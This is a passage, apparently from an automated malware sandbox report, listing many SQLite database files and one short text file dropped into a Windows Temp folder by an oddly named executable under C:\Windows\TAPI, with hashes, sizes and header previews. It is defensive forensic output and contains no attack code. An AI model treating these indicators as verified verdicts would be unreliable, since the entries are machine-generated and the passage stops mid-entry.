                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\fKpKEJRwpw

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\faoqN88YAL

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\fapm23LHBM

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\fzcLEMqFWg

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\g1bTMLHJ7C

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\gA261NBXuR

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\gBxZyoLBkR

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\gL6GMD2jGc

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\gTDswP1uzF

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\gmeO6xaMv4

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\h83MNQz7V4

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\h8GMe8gXsd

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\hHdtdEjZkJ

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\hImMSYAQ7u

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\hMqUSZOZDl

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):25
                                                                                                                                                                        Entropy (8bit):4.323856189774724
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:K5Ggv2n:K5GRn
                                                                                                                                                                        MD5:AF6A61A02B5A29E557C88DDA1CC05B28
                                                                                                                                                                        SHA1:71185C9167A045CA11B5802B7234B78F2F768699
                                                                                                                                                                        SHA-256:7B5343028F3FB920865715CFAD2BD679BAD552BD518BE9F23BC22F9F3E506D11
                                                                                                                                                                        SHA-512:A5DE8FC1EDD0468B0D15950E5660F5B1756121ED69593EEAC66BD9C328C96722450506A0874350DCFD1E8E0C178C0332BF2DC870E0C4EAE18CF0B6438E3B46EA
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:2JghUgfu7TL55YAWhzzBOMNmS

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\hPthNeU4bI

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\hdyn0qKYLb

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\hwKYYYcxhD

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\hzYnIZKYRs

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\i96YYu3iz7

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\iSyqoxtdMj

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
